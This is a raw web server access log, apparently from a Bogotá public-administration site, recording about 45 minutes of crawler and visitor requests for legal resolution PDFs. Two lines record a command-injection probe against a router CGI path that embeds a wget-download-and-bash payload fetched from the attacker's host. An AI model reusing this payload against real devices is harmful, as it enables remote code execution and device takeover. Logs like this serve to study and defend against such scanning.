216.244.66.195 - - [07/Jan/2024:03:36:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0706.pdf HTTP/1.1" 200 613891
201.245.192.253 - - [07/Jan/2024:03:36:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.136 - - [07/Jan/2024:03:36:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3458.pdf HTTP/1.0" 200 1641724
216.244.66.195 - - [07/Jan/2024:03:36:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1089.pdf HTTP/1.1" 200 550853
156.59.198.135 - - [07/Jan/2024:03:36:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3633.pdf HTTP/1.0" 200 436443
172.22.2.4 - - [07/Jan/2024:03:35:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:37:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0496.pdf HTTP/1.0" 200 933695
216.244.66.195 - - [07/Jan/2024:03:37:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1289.pdf HTTP/1.1" 200 619364
156.59.198.136 - - [07/Jan/2024:03:37:48 -0500] "GET /BLA/resoluciones/AUTOS%202019/0227.pdf HTTP/1.0" 200 279180
172.22.2.4 - - [07/Jan/2024:03:36:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52418
156.59.198.136 - - [07/Jan/2024:03:38:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0510.pdf HTTP/1.0" 200 350183
216.244.66.195 - - [07/Jan/2024:03:38:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1589.pdf HTTP/1.1" 200 698692
156.59.198.135 - - [07/Jan/2024:03:38:37 -0500] "GET /BLA/resoluciones/AUTOS%202019/0685.pdf HTTP/1.0" 200 256256
216.244.66.195 - - [07/Jan/2024:03:38:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1637.pdf HTTP/1.1" 200 269294
156.59.198.136 - - [07/Jan/2024:03:39:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3375.pdf HTTP/1.0" 200 482384
216.244.66.195 - - [07/Jan/2024:03:39:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1757.pdf HTTP/1.1" 200 874112
201.245.192.253 - - [07/Jan/2024:03:39:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36480
156.59.198.135 - - [07/Jan/2024:03:39:26 -0500] "GET /BLA/resoluciones/AUTOS%202019/0262.pdf HTTP/1.0" 200 268404
216.244.66.195 - - [07/Jan/2024:03:39:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1838.pdf HTTP/1.1" 200 363306
156.59.198.136 - - [07/Jan/2024:03:39:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/3200.pdf HTTP/1.0" 200 263924
52.167.144.234 - - [07/Jan/2024:03:39:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/2946.pdf HTTP/1.1" 200 391308
201.245.192.253 - - [07/Jan/2024:03:40:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36773
156.59.198.135 - - [07/Jan/2024:03:40:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/5480.pdf HTTP/1.0" 200 251671
216.245.221.92 - - [07/Jan/2024:03:40:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:40:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0031.pdf HTTP/1.0" 200 562548
156.59.198.136 - - [07/Jan/2024:03:41:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0348.pdf HTTP/1.0" 200 994766
52.167.144.234 - - [07/Jan/2024:03:41:07 -0500] "GET /BLA/resoluciones/AUTOS%202020/3625.pdf HTTP/1.1" 200 373140
201.245.192.253 - - [07/Jan/2024:03:41:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.135 - - [07/Jan/2024:03:41:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1393.pdf HTTP/1.0" 200 408925
201.244.241.88 - - [07/Jan/2024:03:41:31 -0500] "GET /inicia-el-2024-conociendo-la-biodiversidad-de-bogoti.html?fbclid=PAAaZLvuex7QzKI-lccZ9zXUItD1-VLmrpEpb8NhXBaRSIa14AMW58FrgJ9Fg_aem_AZ37nGZkqFCa4QHq97USBEXGs-I0xiAxyaHKphqC_OpkVzFL__aoeHPRUpX40OYk1D4 HTTP/1.1" 200 894
156.59.198.136 - - [07/Jan/2024:03:41:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1130.pdf HTTP/1.0" 200 464433
156.59.198.135 - - [07/Jan/2024:03:42:15 -0500] "GET /BLA/resoluciones/AUTOS%202019/3498.pdf HTTP/1.0" 200 213373
156.59.198.135 - - [07/Jan/2024:03:42:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0345.pdf HTTP/1.0" 200 996765
52.167.144.140 - - [07/Jan/2024:03:42:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/3047.pdf HTTP/1.1" 200 349753
172.22.2.4 - - [07/Jan/2024:03:41:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.136 - - [07/Jan/2024:03:43:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0969.pdf HTTP/1.0" 200 483382
156.59.198.136 - - [07/Jan/2024:03:43:28 -0500] "GET /BLA/resoluciones/AUTOS%202019/1959.pdf HTTP/1.0" 200 326751
172.22.2.4 - - [07/Jan/2024:03:42:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52889
156.59.198.136 - - [07/Jan/2024:03:43:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0466.pdf HTTP/1.0" 200 331944
156.59.198.135 - - [07/Jan/2024:03:44:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2882.pdf HTTP/1.0" 200 371140
156.59.198.135 - - [07/Jan/2024:03:44:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3595.pdf HTTP/1.0" 200 460099
156.59.198.136 - - [07/Jan/2024:03:45:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3300.pdf HTTP/1.0" 200 714193
156.59.198.136 - - [07/Jan/2024:03:45:30 -0500] "GET /BLA/resoluciones/AUTOS%202019/1438.pdf HTTP/1.0" 200 271376
216.245.221.92 - - [07/Jan/2024:03:45:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:45:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3005.pdf HTTP/1.0" 200 461312
66.249.66.19 - - [07/Jan/2024:03:46:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0568.pdf HTTP/1.1" 200 692967
201.245.192.253 - - [07/Jan/2024:03:46:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.136 - - [07/Jan/2024:03:46:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0828.pdf HTTP/1.0" 200 375322
40.77.167.78 - - [07/Jan/2024:03:46:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/4373.pdf HTTP/1.1" 200 431594
156.59.198.136 - - [07/Jan/2024:03:46:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0430.pdf HTTP/1.0" 200 333366
156.59.198.135 - - [07/Jan/2024:03:47:07 -0500] "GET /BLA/resoluciones/AUTOS%202019/1006.pdf HTTP/1.0" 200 292793
156.59.198.136 - - [07/Jan/2024:03:47:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3456.pdf HTTP/1.0" 200 1641922
40.77.167.78 - - [07/Jan/2024:03:47:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/03177.pdf HTTP/1.1" 200 2469647
156.59.198.136 - - [07/Jan/2024:03:47:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0842.pdf HTTP/1.0" 200 353316
156.59.198.136 - - [07/Jan/2024:03:48:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0159.pdf HTTP/1.0" 200 337541
156.59.198.135 - - [07/Jan/2024:03:48:44 -0500] "GET /BLA/resoluciones/AUTOS%202019/0413.pdf HTTP/1.0" 200 266714
172.22.2.4 - - [07/Jan/2024:03:47:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:49:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2498.pdf HTTP/1.0" 200 423387
52.167.144.189 - - [07/Jan/2024:03:49:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/1075.pdf HTTP/1.1" 200 350979
156.59.198.135 - - [07/Jan/2024:03:49:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0560.pdf HTTP/1.0" 200 370329
172.22.2.4 - - [07/Jan/2024:03:48:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58567
156.59.198.136 - - [07/Jan/2024:03:49:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0389.pdf HTTP/1.0" 200 334440
52.167.144.235 - - [07/Jan/2024:03:50:11 -0500] "GET /sitemaps.xml HTTP/1.1" 404 1034
156.59.198.135 - - [07/Jan/2024:03:50:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0630.pdf HTTP/1.0" 200 333556
216.245.221.92 - - [07/Jan/2024:03:50:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.136 - - [07/Jan/2024:03:50:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0265.pdf HTTP/1.0" 200 342469
156.59.198.136 - - [07/Jan/2024:03:51:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2443.pdf HTTP/1.0" 200 438764
201.245.192.253 - - [07/Jan/2024:03:51:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.135 - - [07/Jan/2024:03:51:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1570.pdf HTTP/1.0" 200 433667
156.59.198.136 - - [07/Jan/2024:03:52:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0347.pdf HTTP/1.0" 200 618724
156.59.198.135 - - [07/Jan/2024:03:52:25 -0500] "GET /BLA/resoluciones/AUTOS%202019/2438.pdf HTTP/1.0" 200 263028
156.59.198.136 - - [07/Jan/2024:03:52:48 -0500] "GET /BLA/resoluciones/AUTOS%202019/4472.pdf HTTP/1.0" 200 296644
156.59.198.135 - - [07/Jan/2024:03:53:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2793.pdf HTTP/1.0" 200 354864
156.59.198.136 - - [07/Jan/2024:03:53:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0508.pdf HTTP/1.0" 200 331892
156.59.198.136 - - [07/Jan/2024:03:54:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0763.pdf HTTP/1.0" 200 342611
40.77.167.136 - - [07/Jan/2024:03:54:11 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Fauna-gif.gif HTTP/1.1" 200 3779027
156.59.198.136 - - [07/Jan/2024:03:54:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0004.pdf HTTP/1.0" 200 2971982
172.22.2.4 - - [07/Jan/2024:03:53:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.43.24 - - [07/Jan/2024:03:54:52 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2007%2FRES+2007+601+AL+700%2F HTTP/1.1" 200 26655
47.128.43.24 - - [07/Jan/2024:03:54:53 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
47.128.43.24 - - [07/Jan/2024:03:54:54 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.43.24 - - [07/Jan/2024:03:54:54 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
156.59.198.135 - - [07/Jan/2024:03:55:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0866.pdf HTTP/1.0" 200 344803
172.22.2.4 - - [07/Jan/2024:03:53:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60502
216.245.221.92 - - [07/Jan/2024:03:55:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:55:39 -0500] "GET /BLA/resoluciones/AUTOS%202019/2722.pdf HTTP/1.0" 200 254472
156.59.198.136 - - [07/Jan/2024:03:56:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0543.pdf HTTP/1.0" 200 332747
201.245.192.253 - - [07/Jan/2024:03:56:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
66.249.66.19 - - [07/Jan/2024:03:56:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2836.pdf HTTP/1.1" 200 255474
156.59.198.135 - - [07/Jan/2024:03:56:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0392.pdf HTTP/1.0" 200 327842
156.59.198.136 - - [07/Jan/2024:03:56:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0736.pdf HTTP/1.0" 200 348170
156.59.198.136 - - [07/Jan/2024:03:57:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2380.pdf HTTP/1.0" 200 1779659
156.59.198.136 - - [07/Jan/2024:03:57:41 -0500] "GET /BLA/resoluciones/AUTOS%202019/3660.pdf HTTP/1.0" 200 248540
156.59.198.135 - - [07/Jan/2024:03:58:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0435.pdf HTTP/1.0" 200 330894
156.59.198.136 - - [07/Jan/2024:03:58:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0730.pdf HTTP/1.0" 200 461175
156.59.198.136 - - [07/Jan/2024:03:58:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1307.pdf HTTP/1.0" 200 2092578
156.59.198.135 - - [07/Jan/2024:03:59:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1634.pdf HTTP/1.0" 200 401068
156.59.198.136 - - [07/Jan/2024:03:59:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2940.pdf HTTP/1.0" 200 410543
156.59.198.135 - - [07/Jan/2024:04:00:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3271.pdf HTTP/1.0" 200 411674
172.22.2.4 - - [07/Jan/2024:03:58:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:04:00:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3872.pdf HTTP/1.0" 200 390530
216.245.221.92 - - [07/Jan/2024:04:00:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.136 - - [07/Jan/2024:04:00:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0507.pdf HTTP/1.0" 200 365314
201.245.192.253 - - [07/Jan/2024:04:01:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.136 - - [07/Jan/2024:04:01:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2296.pdf HTTP/1.0" 200 407203
172.22.2.4 - - [07/Jan/2024:03:59:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58567
52.167.144.145 - - [07/Jan/2024:04:01:24 -0500] "GET /BLA/resoluciones/AUTOS%202020/3426.pdf HTTP/1.1" 200 1823492
156.59.198.135 - - [07/Jan/2024:04:01:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0201.pdf HTTP/1.0" 200 343556
47.128.47.243 - - [07/Jan/2024:04:02:20 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
47.128.47.243 - - [07/Jan/2024:04:02:20 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
47.128.47.243 - - [07/Jan/2024:04:02:21 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
156.59.198.136 - - [07/Jan/2024:04:02:31 -0500] "GET /BLA/resoluciones/AUTOS%202019/0282.pdf HTTP/1.0" 200 277476
185.224.128.191 - - [07/Jan/2024:04:02:39 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.224.128.191%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20bash%20tenda.sh) HTTP/1.1" 404 1018
185.224.128.191 - - [07/Jan/2024:04:02:39 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.224.128.191%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20bash%20tenda.sh) HTTP/1.1" 404 1018
216.244.66.195 - - [07/Jan/2024:04:02:43 -0500] "GET /robots.txt HTTP/1.1" 404 1018
47.128.47.243 - - [07/Jan/2024:04:02:19 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202017%2F&order=asc&sort=size HTTP/1.1" 200 290763
40.77.167.136 - - [07/Jan/2024:04:02:51 -0500] "GET /68-de-ejecucion-lleva-el-plan-de-accion-para-las-familias-de-bogota-que-va-del-2021-al-2025.html HTTP/1.1" 200 811
66.249.66.20 - - [07/Jan/2024:04:02:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2544.pdf HTTP/1.1" 200 720463
156.59.198.136 - - [07/Jan/2024:04:02:57 -0500] "GET /BLA/resoluciones/AUTOS%202019/1112.pdf HTTP/1.0" 200 276837
156.59.198.136 - - [07/Jan/2024:04:03:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3270.pdf HTTP/1.0" 200 882682
156.59.198.135 - - [07/Jan/2024:04:03:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2972.pdf HTTP/1.0" 200 541292
156.59.198.135 - - [07/Jan/2024:04:04:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1545.pdf HTTP/1.0" 200 454463
156.59.198.135 - - [07/Jan/2024:04:04:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0638.pdf HTTP/1.0" 200 365618
156.59.198.136 - - [07/Jan/2024:04:04:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0211.pdf HTTP/1.0" 200 393426
156.59.198.135 - - [07/Jan/2024:04:05:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1269.pdf HTTP/1.0" 200 395134
216.245.221.92 - - [07/Jan/2024:04:05:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jan/2024:04:04:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
156.59.198.135 - - [07/Jan/2024:04:05:46 -0500] "GET /BLA/resoluciones/AUTOS%202019/4456.pdf HTTP/1.0" 200 280962
156.59.198.135 - - [07/Jan/2024:04:06:09 -0500] "GET /BLA/resoluciones/AUTOS%202019/2879.pdf HTTP/1.0" 200 274259
201.245.192.253 - - [07/Jan/2024:04:06:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
172.22.2.4 - - [07/Jan/2024:04:04:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:04:06:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1066.pdf HTTP/1.0" 200 529558
156.59.198.135 - - [07/Jan/2024:04:06:58 -0500] "GET /BLA/resoluciones/AUTOS%202019/4146.pdf HTTP/1.0" 200 286611
172.22.2.4 - - [07/Jan/2024:04:05:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58567
40.77.167.79 - - [07/Jan/2024:04:07:12 -0500] "GET /programate-para-las-caminatas-ecologicas-de-diciembre.html HTTP/1.1" 200 807
156.59.198.136 - - [07/Jan/2024:04:07:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1979.pdf HTTP/1.0" 200 406459
156.59.198.136 - - [07/Jan/2024:04:07:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1418.pdf HTTP/1.0" 200 446793
156.59.198.135 - - [07/Jan/2024:04:08:11 -0500] "GET /BLA/resoluciones/AUTOS%202019/2165.pdf HTTP/1.0" 200 259965
156.59.198.136 - - [07/Jan/2024:04:08:36 -0500] "GET /BLA/resoluciones/AUTOS%202019/5407.pdf HTTP/1.0" 200 278482
156.59.198.135 - - [07/Jan/2024:04:09:00 -0500] "GET /BLA/resoluciones/AUTOS%202019/3509.pdf HTTP/1.0" 200 286337
156.59.198.136 - - [07/Jan/2024:04:09:24 -0500] "GET /BLA/resoluciones/AUTOS%202019/0641.pdf HTTP/1.0" 200 236779
156.59.198.135 - - [07/Jan/2024:04:09:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0604.pdf HTTP/1.0" 200 3436343
156.59.198.135 - - [07/Jan/2024:04:10:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0183.pdf HTTP/1.0" 200 337040
66.249.66.21 - - [07/Jan/2024:04:10:15 -0500] "GET /BLA/resoluciones/AUTOS%202011/3183.pdf HTTP/1.1" 200 225765
69.171.231.10 - - [07/Jan/2024:04:10:15 -0500] "GET /inicia-el-2024-conociendo-la-biodiversidad-de-bogoti.html HTTP/1.1" 200 894
216.245.221.92 - - [07/Jan/2024:04:10:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.136 - - [07/Jan/2024:04:10:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0325.pdf HTTP/1.0" 200 448585
156.59.198.136 - - [07/Jan/2024:04:11:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/1525.pdf HTTP/1.0" 200 242513
201.245.192.253 - - [07/Jan/2024:04:11:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.135 - - [07/Jan/2024:04:11:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2964.pdf HTTP/1.0" 200 359661
156.59.198.136 - - [07/Jan/2024:04:11:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1471.pdf HTTP/1.0" 200 370113
172.22.2.4 - - [07/Jan/2024:04:10:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:04:12:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1071.pdf HTTP/1.0" 200 563265
40.77.167.126 - - [07/Jan/2024:04:12:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/2697.pdf HTTP/1.1" 200 2509375
66.249.66.21 - - [07/Jan/2024:04:12:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3325.pdf HTTP/1.1" 200 767058
156.59.198.136 - - [07/Jan/2024:04:12:40 -0500] "GET /BLA/resoluciones/AUTOS%202019/2019.pdf HTTP/1.0" 200 316936
172.22.2.4 - - [07/Jan/2024:04:11:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52889
156.59.198.135 - - [07/Jan/2024:04:13:05 -0500] "GET /BLA/resoluciones/AUTOS%202019/0494.pdf HTTP/1.0" 200 239854
156.59.198.136 - - [07/Jan/2024:04:13:29 -0500] "GET /BLA/resoluciones/AUTOS%202019/3591.pdf HTTP/1.0" 200 289689
40.77.167.18 - - [07/Jan/2024:04:13:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/02010.pdf HTTP/1.1" 200 3161824
156.59.198.136 - - [07/Jan/2024:04:13:54 -0500] "GET /BLA/resoluciones/AUTOS%202019/2255.pdf HTTP/1.0" 200 320345
156.59.198.135 - - [07/Jan/2024:04:14:18 -0500] "GET /BLA/resoluciones/AUTOS%202019/2869.pdf HTTP/1.0" 200 273708
156.59.198.135 - - [07/Jan/2024:04:14:43 -0500] "GET /BLA/resoluciones/AUTOS%202019/2762.pdf HTTP/1.0" 200 278558
216.244.66.195 - - [07/Jan/2024:04:14:59 -0500] "GET /galeria/galeria/fotos/3humedal-Burro3G.jpg HTTP/1.1" 200 74809
156.59.198.136 - - [07/Jan/2024:04:15:07 -0500] "GET /BLA/resoluciones/AUTOS%202019/0894.pdf HTTP/1.0" 200 270124
201.245.192.253 - - [07/Jan/2024:04:15:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36637
201.245.192.253 - - [07/Jan/2024:04:15:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36798
66.249.66.20 - - [07/Jan/2024:04:15:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3113.pdf HTTP/1.1" 200 539623
156.59.198.135 - - [07/Jan/2024:04:15:31 -0500] "GET /BLA/resoluciones/AUTOS%202019/0388.pdf HTTP/1.0" 200 227215
216.245.221.92 - - [07/Jan/2024:04:15:35 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.19 - - [07/Jan/2024:04:15:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1159.pdf HTTP/1.1" 200 391155
216.244.66.195 - - [07/Jan/2024:04:15:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1222.pdf HTTP/1.1" 200 2793339
156.59.198.135 - - [07/Jan/2024:04:15:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0432.pdf HTTP/1.0" 200 333617
201.245.192.253 - - [07/Jan/2024:04:16:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.136 - - [07/Jan/2024:04:16:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0198.pdf HTTP/1.0" 200 343602
66.249.66.19 - - [07/Jan/2024:04:16:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1390.pdf HTTP/1.1" 200 348250
216.244.66.195 - - [07/Jan/2024:04:16:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1460.pdf HTTP/1.1" 200 687854
156.59.198.136 - - [07/Jan/2024:04:16:43 -0500] "GET /BLA/resoluciones/AUTOS%202019/3107.pdf HTTP/1.0" 200 259999
156.59.198.136 - - [07/Jan/2024:04:17:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0425.pdf HTTP/1.0" 200 354254
216.244.66.195 - - [07/Jan/2024:04:17:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1557.pdf HTTP/1.1" 200 351139
156.59.198.135 - - [07/Jan/2024:04:17:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0844.pdf HTTP/1.0" 200 351233
216.244.66.195 - - [07/Jan/2024:04:17:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1578.pdf HTTP/1.1" 200 545809
156.59.198.135 - - [07/Jan/2024:04:17:57 -0500] "GET /BLA/resoluciones/AUTOS%202019/4395.pdf HTTP/1.0" 200 275298
172.22.2.4 - - [07/Jan/2024:04:16:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.136 - - [07/Jan/2024:04:18:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1454.pdf HTTP/1.0" 200 487328
216.244.66.195 - - [07/Jan/2024:04:18:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2515.pdf HTTP/1.1" 200 450991
66.249.66.20 - - [07/Jan/2024:04:18:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9804.pdf HTTP/1.1" 200 550225
156.59.198.136 - - [07/Jan/2024:04:18:46 -0500] "GET /BLA/resoluciones/AUTOS%202019/4440.pdf HTTP/1.0" 200 265788
172.22.2.4 - - [07/Jan/2024:04:17:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58172
216.244.66.195 - - [07/Jan/2024:04:19:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2531.pdf HTTP/1.1" 200 298139
156.59.198.136 - - [07/Jan/2024:04:19:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2528.pdf HTTP/1.0" 200 364314
201.245.192.253 - - [07/Jan/2024:04:19:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36637
66.249.66.21 - - [07/Jan/2024:04:19:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4086.pdf HTTP/1.1" 200 895524
156.59.198.136 - - [07/Jan/2024:04:19:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3528.pdf HTTP/1.0" 200 420009
216.244.66.195 - - [07/Jan/2024:04:19:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/3261.pdf HTTP/1.1" 200 903652
156.59.198.135 - - [07/Jan/2024:04:19:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0381.pdf HTTP/1.0" 200 330370
201.245.192.253 - - [07/Jan/2024:04:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36798
156.59.198.135 - - [07/Jan/2024:04:20:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0553.pdf HTTP/1.0" 200 352935
216.244.66.195 - - [07/Jan/2024:04:20:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0102.pdf HTTP/1.1" 200 891992
216.245.221.92 - - [07/Jan/2024:04:20:35 -0500] "HEAD / HTTP/1.1" 200 -
